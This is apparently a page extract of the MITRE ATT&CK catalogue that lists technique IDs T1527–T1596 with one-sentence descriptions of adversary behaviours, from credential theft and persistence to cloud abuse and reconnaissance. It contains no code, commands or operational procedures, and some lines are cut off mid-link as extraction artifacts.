Application Access Token (T1527): Adversaries may use application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems.

Steal Application Access Token (T1528): Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.

System Shutdown/Reboot (T1529): Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.

Data from Cloud Storage (T1530): Adversaries may access data from cloud storage.

Account Access Removal (T1531): Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.

Archive Collected Data (T1532): Adversaries may compress and/or encrypt data that is collected prior to exfiltration.

Data from Local System (T1533): Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to exfiltration.

Internal Spearphishing (T1534): After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization.

Unused/Unsupported Cloud Regions (T1535): Adversaries may create cloud instances in unused geographic service regions in order to evade detection.

Revert Cloud Instance (T1536): An adversary may revert changes made to a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.

Transfer Data to Cloud Account (T1537): Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.

Cloud Service Dashboard (T1538): An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features.

Steal Web Session Cookie (T1539): An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.

Code Injection (T1540): Adversaries may use code injection attacks to implant arbitrary code into the address space of a running application.

Foreground Persistence (T1541): Adversaries may abuse Android's `startForeground()` API method to maintain continuous sensor access.

Pre-OS Boot (T1542): Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system.
  System Firmware (T1542.001): Adversaries may modify system firmware to persist on systems.
  Component Firmware (T1542.002): Adversaries may modify component firmware to persist on systems.
  Bootkit (T1542.003): Adversaries may use bootkits to persist on systems.
  ROMMONkit (T1542.004): Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect.
  TFTP Boot (T1542.005): Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server.

Create or Modify System Process (T1543): Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.
  Launch Agent (T1543.001): Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence.
  Systemd Service (T1543.002): Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence.
  Windows Service (T1543.003): Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence.
  Launch Daemon (T1543.004): Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence.
  Container Service (T1543.005): Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts.

Ingress Tool Transfer (T1544): Adversaries may transfer tools or other files from an external system onto a compromised device to facilitate follow-on actions.

Event Triggered Execution (T1546): Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.
  Change Default File Association (T1546.001): Adversaries may establish persistence by executing malicious content triggered by a file type association.
  Screensaver (T1546.002): Adversaries may establish persistence by executing malicious content triggered by user inactivity.
  Windows Management Instrumentation Event Subscription (T1546.003): Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.
  Unix Shell Configuration Modification (T1546.004): Adversaries may establish persistence through executing malicious commands triggered by a user’s shell.
  Trap (T1546.005): Adversaries may establish persistence by executing malicious content triggered by an interrupt signal.
  LC_LOAD_DYLIB Addition (T1546.006): Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries.
  Netsh Helper DLL (T1546.007): Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs.
  Accessibility Features (T1546.008): Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features.
  AppCert DLLs (T1546.009): Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes.
  AppInit DLLs (T1546.010): Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
  Application Shimming (T1546.011): Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
  Image File Execution Options Injection (T1546.012): Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers.
  PowerShell Profile (T1546.013): Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.
  Emond (T1546.014): Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond).
  Component Object Model Hijacking (T1546.015): Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
  Installer Packages (T1546.016): Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content.
  Udev Rules (T1546.017): Adversaries may maintain persistence through executing malicious content triggered using udev rules.

Boot or Logon Autostart Execution (T1547): Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.
  Registry Run Keys / Startup Folder (T1547.001): Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.
  Authentication Package (T1547.002): Adversaries may abuse authentication packages to execute DLLs when the system boots.
  Time Providers (T1547.003): Adversaries may abuse time providers to execute DLLs when the system boots.
  Winlogon Helper DLL (T1547.004): Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.
  Security Support Provider (T1547.005): Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots.
  Kernel Modules and Extensions (T1547.006): Adversaries may modify the kernel to automatically execute programs on system boot.
  Re-opened Applications (T1547.007): Adversaries may modify plist files to automatically run an application when a user logs in.
  LSASS Driver (T1547.008): Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems.
  Shortcut Modification (T1547.009): Adversaries may create or modify shortcuts that can execute a program during system boot or user login.
  Port Monitors (T1547.010): Adversaries may use port monitors to run an adversary-supplied DLL during system boot for persistence or privilege escalation.
  Plist Modification (T1547.011): Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence.
  Print Processors (T1547.012): Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.
  XDG Autostart Entries (T1547.013): Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login.
  Active Setup (T1547.014): Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
  Login Items (T1547.015): Adversaries may add login items to execute upon user login to gain persistence or escalate privileges.

Abuse Elevation Control Mechanism (T1548): Adversaries may circumvent mechanisms designed to control elevated privileges to gain higher-level permissions.
  Setuid and Setgid (T1548.001): An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context.
  Bypass User Account Control (T1548.002): Adversaries may bypass UAC mechanisms to elevate process privileges on a system.
  Sudo and Sudo Caching (T1548.003): Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges.
  Elevated Execution with Prompt (T1548.004): Adversaries may leverage the `AuthorizationExecuteWithPrivileges` API to escalate privileges by prompting the user for credentials.
  Temporary Elevated Cloud Access (T1548.005): Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources.
  TCC Manipulation (T1548.006): Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions.

Use Alternate Authentication Material (T1550): Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.
  Application Access Token (T1550.001): Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems.
  Pass the Hash (T1550.002): Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls.
  Pass the Ticket (T1550.003): Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls.
  Web Session Cookie (T1550.004): Adversaries can use stolen session cookies to authenticate to web applications and services.

Unsecured Credentials (T1552): Adversaries may search compromised systems to find and obtain insecurely stored credentials.
  Credentials In Files (T1552.001): Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.
  Credentials in Registry (T1552.002): Adversaries may search the Registry on compromised systems for insecurely stored credentials.
  Bash History (T1552.003): Adversaries may search the bash command history on compromised systems for insecurely stored credentials.
  Private Keys (T1552.004): Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials.
  Cloud Instance Metadata API (T1552.005): Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
  Group Policy Preferences (T1552.006): Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP).
  Container API (T1552.007): Adversaries may gather credentials via APIs within a container environment.
  Chat Messages (T1552.008): Adversaries may directly collect unsecured credentials stored or passed through user communication services.

Subvert Trust Controls (T1553): Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs.
  Gatekeeper Bypass (T1553.001): Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs.
  Code Signing (T1553.002): Adversaries may create, acquire, or steal code signing materials to sign their malware or tools.
  SIP and Trust Provider Hijacking (T1553.003): Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks.
  Install Root Certificate (T1553.004): Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary-controlled web servers.
  Mark-of-the-Web Bypass (T1553.005): Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls.
  Code Signing Policy Modification (T1553.006): Adversaries may modify code signing policies to enable execution of unsigned or self-signed code.

Compromise Host Software Binary (T1554): Adversaries may modify host software binaries to establish persistent access to systems.

Credentials from Password Stores (T1555)

View on ATT&CK

Adversaries may search for common password storage locations to obtain user credentials.

More Info

In Playbook
Credentials from Password Stores

Keychain (T1555.001)

View on ATT&CK

Adversaries may acquire credentials from Keychain.

More Info

In Playbook
Credentials from Password Stores

Securityd Memory (T1555.002)

View on ATT&CK

An adversary with root access may gather credentials by reading `securityd`’s memory.

More Info

In Playbook
Credentials from Password Stores

Credentials from Web Browsers (T1555.003)

View on ATT&CK

Adversaries may acquire credentials from web browsers by reading files specific to the target browser.

More Info

In Playbook
Credentials from Password Stores

Windows Credential Manager (T1555.004)

View on ATT&CK

Adversaries may acquire credentials from the Windows Credential Manager.

More Info

In Playbook
Credentials from Password Stores

Password Managers (T1555.005)

View on ATT&CK

Adversaries may acquire user credentials from third-party password managers.

More Info

In Playbook
Credentials from Password Stores

Cloud Secrets Management Stores (T1555.006)

View on ATT&CK

Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.

More Info

In Playbook

Modify Authentication Process (T1556): Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts.
  Domain Controller Authentication (T1556.001): Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.
  Password Filter DLL (T1556.002): Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.
  Pluggable Authentication Modules (T1556.003): Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts.
  Network Device Authentication (T1556.004): Adversaries may use [Patch System Image](https://attack.
  Reversible Encryption (T1556.005): An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems.
  Multi-Factor Authentication (T1556.006): Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.
  Hybrid Identity (T1556.007): Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.
  Network Provider DLL (T1556.008): Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process.
  Conditional Access Policies (T1556.009): Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts.

Adversary-in-the-Middle (T1557): Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.
  LLMNR/NBT-NS Poisoning and SMB Relay (T1557.001): By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system.
  ARP Cache Poisoning (T1557.002): Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices.
  DHCP Spoofing (T1557.003): Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network.
  Evil Twin (T1557.004): Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as [Network Sniffing](https://attack.

Steal or Forge Kerberos Tickets (T1558): Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.
  Golden Ticket (T1558.001): Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.
  Silver Ticket (T1558.002): Adversaries who have the password hash of a target service account (e.
  Kerberoasting (T1558.003): Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.
  AS-REP Roasting (T1558.004): Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.
  Ccache Files (T1558.005): Adversaries may attempt to steal Kerberos tickets stored in credential cache files (or ccache).

Inter-Process Communication (T1559): Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution.
  Component Object Model (T1559.001): Adversaries may use the Windows Component Object Model (COM) for local code execution.
  Dynamic Data Exchange (T1559.002): Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands.
  XPC Services (T1559.003): Adversaries can provide malicious content to an XPC service daemon for local code execution.

Archive Collected Data (T1560): An adversary may compress and/or encrypt data that is collected prior to exfiltration.
  Archive via Utility (T1560.001): Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration.
  Archive via Library (T1560.002): An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries.
  Archive via Custom Method (T1560.003): An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method.

Disk Wipe (T1561): Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources.
  Disk Content Wipe (T1561.001): Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.
  Disk Structure Wipe (T1561.002): Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system, targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.

Impair Defenses (T1562): Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.
  Disable or Modify Tools (T1562.001): Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities.
  Disable Windows Event Logging (T1562.002): Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits.
  Impair Command History Logging (T1562.003): Adversaries may impair command history logging to hide commands they run on a compromised system.
  Disable or Modify System Firewall (T1562.004): Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage.
  Indicator Blocking (T1562.006): An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed.
  Disable or Modify Cloud Firewall (T1562.007): Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources.
  Disable or Modify Cloud Logs (T1562.008): An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection.
  Safe Mode Boot (T1562.009): Adversaries may abuse Windows safe mode to disable endpoint defenses.
  Downgrade Attack (T1562.010): Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls.
  Spoof Security Alerting (T1562.011): Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.
  Disable or Modify Linux Audit System (T1562.012): Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection.

Remote Service Session Hijacking (T1563): Adversaries may take control of preexisting sessions with remote services to move laterally in an environment.
  SSH Hijacking (T1563.001): Adversaries may hijack a legitimate user's SSH session to move laterally within an environment.
  RDP Hijacking (T1563.002): Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment.

Hide Artifacts (T1564): Adversaries may attempt to hide artifacts associated with their behaviors to evade detection.
  Hidden Files and Directories (T1564.001): Adversaries may set files and directories to be hidden to evade detection mechanisms.
  Hidden Users (T1564.002): Adversaries may use hidden users to hide the presence of user accounts they create or modify.
  Hidden Window (T1564.003): Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.
  NTFS File Attributes (T1564.004): Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection.
  Hidden File System (T1564.005): Adversaries may use a hidden file system to conceal malicious activity from users and security tools.
  Run Virtual Instance (T1564.006): Adversaries may carry out malicious operations using a virtual instance to avoid detection.
  VBA Stomping (T1564.007): Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.
  Email Hiding Rules (T1564.008): Adversaries may use email rules to hide inbound emails in a compromised user's mailbox.
  Resource Forking (T1564.009): Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications.
  Process Argument Spoofing (T1564.010): Adversaries may attempt to hide process command-line arguments by overwriting process memory.
  Ignore Process Interrupts (T1564.011): Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals.
  File/Path Exclusions (T1564.012): Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities.

Data Manipulation (T1565): Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.
  Stored Data Manipulation (T1565.001): Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.
  Transmitted Data Manipulation (T1565.002): Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.
  Runtime Data Manipulation (T1565.003): Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.

Phishing (T1566): Adversaries may send phishing messages to gain access to victim systems.
  Spearphishing Attachment (T1566.001): Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.
  Spearphishing Link (T1566.002): Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems.
  Spearphishing via Service (T1566.003): Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems.
  Spearphishing Voice (T1566.004): Adversaries may use voice communications to ultimately gain access to victim systems.

Exfiltration Over Web Service (T1567): Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.
  Exfiltration to Code Repository (T1567.001): Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel.
  Exfiltration to Cloud Storage (T1567.002): Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel.
  Exfiltration to Text Storage Sites (T1567.003): Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel.
  Exfiltration Over Webhook (T1567.004): Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel.

Dynamic Resolution (T1568): Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations.
  Fast Flux DNS (T1568.001): Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution.
  Domain Generation Algorithms (T1568.002): Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains.
  DNS Calculation (T1568.003): Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address.

System Services (T1569): Adversaries may abuse system services or daemons to execute commands or programs.
  Launchctl (T1569.001): Adversaries may abuse launchctl to execute commands or programs.
  Service Execution (T1569.002): Adversaries may abuse the Windows service control manager to execute malicious commands or payloads.

Lateral Tool Transfer (T1570): Adversaries may transfer tools or other files between systems in a compromised environment.

Non-Standard Port (T1571): Adversaries may communicate using a protocol and port pairing that are typically not associated.

Protocol Tunneling (T1572): Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems.

Encrypted Channel (T1573): Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.
  Symmetric Cryptography (T1573.001): Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.
  Asymmetric Cryptography (T1573.002): Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.

Hijack Execution Flow (T1574): Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs.
  DLL Search Order Hijacking (T1574.001): Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs.
  DLL Side-Loading (T1574.002): Adversaries may execute their own malicious payloads by side-loading DLLs.
  Dylib Hijacking (T1574.004): Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime.
  Executable Installer File Permissions Weakness (T1574.005): Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer.
  Dynamic Linker Hijacking (T1574.006): Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries.
  Path Interception by PATH Environment Variable (T1574.007): Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries.
  Path Interception by Search Order Hijacking (T1574.008): Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs.
  Path Interception by Unquoted Path (T1574.009): Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.
  Services File Permissions Weakness (T1574.010): Adversaries may execute their own malicious payloads by hijacking the binaries used by services.
  Services Registry Permissions Weakness (T1574.011): Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
  COR_PROFILER (T1574.012): Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .
  KernelCallbackTable (T1574.013): Adversaries may abuse the `KernelCallbackTable` of a process to hijack its execution flow in order to run their own payloads.
  AppDomainManager (T1574.014): Adversaries may execute their own malicious payloads by hijacking how the .

Native API (T1575): Adversaries may use Android’s Native Development Kit (NDK) to write native functions that can achieve execution of binaries or functions.

Uninstall Malicious Application (T1576): Adversaries may include functionality in malware that uninstalls the malicious application from the device.

Compromise Application Executable (T1577): Adversaries may modify applications installed on a device to establish persistent access to a victim.

Modify Cloud Compute Infrastructure (T1578): An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses.
  Create Snapshot (T1578.001): An adversary may create a snapshot or data backup within a cloud account to evade defenses.
  Create Cloud Instance (T1578.002): An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses.
  Delete Cloud Instance (T1578.003): An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.
  Revert Cloud Instance (T1578.004): An adversary may revert changes made to a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.
  Modify Cloud Compute Configurations (T1578.005): Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses.

Keychain (T1579): Adversaries may collect the keychain storage data from an iOS device to acquire credentials.

Cloud Infrastructure Discovery (T1580): An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment.

Geofencing (T1581): Adversaries may use a device’s geographical location to limit certain malicious behaviors.

SMS Control (T1582): Adversaries may delete, alter, or send SMS messages without user authorization.

Acquire Infrastructure (T1583): Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting.
  Domains (T1583.001): Adversaries may acquire domains that can be used during targeting.
  DNS Server (T1583.002): Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting.
  Virtual Private Server (T1583.003): Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting.
  Server (T1583.004): Adversaries may buy, lease, rent, or obtain physical servers that can be used during targeting.
  Botnet (T1583.005): Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting.
  Web Services (T1583.006): Adversaries may register for web services that can be used during targeting.
  Serverless (T1583.007): Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting.
  Malvertising (T1583.008): Adversaries may purchase online advertisements that can be abused to distribute malware to victims.

Compromise Infrastructure (T1584): Adversaries may compromise third-party infrastructure that can be used during targeting.
  Domains (T1584.001): Adversaries may hijack domains and/or subdomains that can be used during targeting.
  DNS Server (T1584.002): Adversaries may compromise third-party DNS servers that can be used during targeting.
  Virtual Private Server (T1584.003): Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting.
  Server (T1584.004): Adversaries may compromise third-party servers that can be used during targeting.
  Botnet (T1584.005): Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting.
  Web Services (T1584.006): Adversaries may compromise access to third-party web services that can be used during targeting.
  Serverless (T1584.007): Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting.
  Network Devices (T1584.008): Adversaries may compromise third-party network devices that can be used during targeting.

Establish Accounts (T1585): Adversaries may create and cultivate accounts with services that can be used during targeting.
  Social Media Accounts (T1585.001): Adversaries may create and cultivate social media accounts that can be used during targeting.
  Email Accounts (T1585.002): Adversaries may create email accounts that can be used during targeting.
  Cloud Accounts (T1585.003): Adversaries may create accounts with cloud providers that can be used during targeting.

Compromise Accounts (T1586): Adversaries may compromise accounts with services that can be used during targeting.
  Social Media Accounts (T1586.001): Adversaries may compromise social media accounts that can be used during targeting.
  Email Accounts (T1586.002): Adversaries may compromise email accounts that can be used during targeting.
  Cloud Accounts (T1586.003): Adversaries may compromise cloud accounts that can be used during targeting.

Develop Capabilities (T1587): Adversaries may build capabilities that can be used during targeting.
  Malware (T1587.001): Adversaries may develop malware and malware components that can be used during targeting.
  Code Signing Certificates (T1587.002): Adversaries may create self-signed code signing certificates that can be used during targeting.
  Digital Certificates (T1587.003): Adversaries may create self-signed SSL/TLS certificates that can be used during targeting.
  Exploits (T1587.004): Adversaries may develop exploits that can be used during targeting.

Obtain Capabilities (T1588): Adversaries may buy and/or steal capabilities that can be used during targeting.
  Malware (T1588.001): Adversaries may buy, steal, or download malware that can be used during targeting.
  Tool (T1588.002): Adversaries may buy, steal, or download software tools that can be used during targeting.
  Code Signing Certificates (T1588.003): Adversaries may buy and/or steal code signing certificates that can be used during targeting.
  Digital Certificates (T1588.004): Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting.
  Exploits (T1588.005): Adversaries may buy, steal, or download exploits that can be used during targeting.
  Vulnerabilities (T1588.006): Adversaries may acquire information about vulnerabilities that can be used during targeting.
  Artificial Intelligence (T1588.007): Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting.

Gather Victim Identity Information (T1589): Adversaries may gather information about the victim's identity that can be used during targeting.
  Credentials (T1589.001): Adversaries may gather credentials that can be used during targeting.
  Email Addresses (T1589.002): Adversaries may gather email addresses that can be used during targeting.
  Employee Names (T1589.003): Adversaries may gather employee names that can be used during targeting.

Gather Victim Network Information (T1590): Adversaries may gather information about the victim's networks that can be used during targeting.
  Domain Properties (T1590.001): Adversaries may gather information about the victim's network domain(s) that can be used during targeting.
  DNS (T1590.002): Adversaries may gather information about the victim's DNS that can be used during targeting.
  Network Trust Dependencies (T1590.003): Adversaries may gather information about the victim's network trust dependencies that can be used during targeting.
  Network Topology (T1590.004): Adversaries may gather information about the victim's network topology that can be used during targeting.
  IP Addresses (T1590.005): Adversaries may gather the victim's IP addresses that can be used during targeting.
  Network Security Appliances (T1590.006): Adversaries may gather information about the victim's network security appliances that can be used during targeting.

Gather Victim Org Information (T1591)

Adversaries may gather information about the victim's organization that can be used during targeting.

Gather Victim Org Information: Determine Physical Locations (T1591.001)

Adversaries may gather the victim's physical location(s) that can be used during targeting.

Gather Victim Org Information: Business Relationships (T1591.002)

Adversaries may gather information about the victim's business relationships that can be used during targeting.

Gather Victim Org Information: Identify Business Tempo (T1591.003)

Adversaries may gather information about the victim's business tempo that can be used during targeting.

Gather Victim Org Information: Identify Roles (T1591.004)

Adversaries may gather information about identities and roles within the victim organization that can be used during targeting.

Gather Victim Host Information (T1592)

Adversaries may gather information about the victim's hosts that can be used during targeting.

Gather Victim Host Information: Hardware (T1592.001)

Adversaries may gather information about the victim's host hardware that can be used during targeting.

Gather Victim Host Information: Software (T1592.002)

Adversaries may gather information about the victim's host software that can be used during targeting.

Gather Victim Host Information: Firmware (T1592.003)

Adversaries may gather information about the victim's host firmware that can be used during targeting.

Gather Victim Host Information: Client Configurations (T1592.004)

Adversaries may gather information about the victim's client configurations that can be used during targeting.

Search Open Websites/Domains (T1593)

Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting.

Search Open Websites/Domains: Social Media (T1593.001)

Adversaries may search social media for information about victims that can be used during targeting.

Search Open Websites/Domains: Search Engines (T1593.002)

Adversaries may use search engines to collect information about victims that can be used during targeting.

Search Open Websites/Domains: Code Repositories (T1593.003)

Adversaries may search public code repositories for information about victims that can be used during targeting.

Search Victim-Owned Websites (T1594)

Adversaries may search websites owned by the victim for information that can be used during targeting.

Active Scanning (T1595)

Adversaries may execute active reconnaissance scans to gather information that can be used during targeting.

Active Scanning: Scanning IP Blocks (T1595.001)

Adversaries may scan victim IP blocks to gather information that can be used during targeting.

Active Scanning: Vulnerability Scanning (T1595.002)

Adversaries may scan victims for vulnerabilities that can be used during targeting.

Active Scanning: Wordlist Scanning (T1595.003)

Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques.

Search Open Technical Databases (T1596)

Adversaries may search freely available technical databases for information about victims that can be used during targeting.

Search Open Technical Databases: DNS/Passive DNS (T1596.001)

Adversaries may search DNS data for information about victims that can be used during targeting.

Search Open Technical Databases: WHOIS (T1596.002)

Adversaries may search public WHOIS data for information about victims that can be used during targeting.

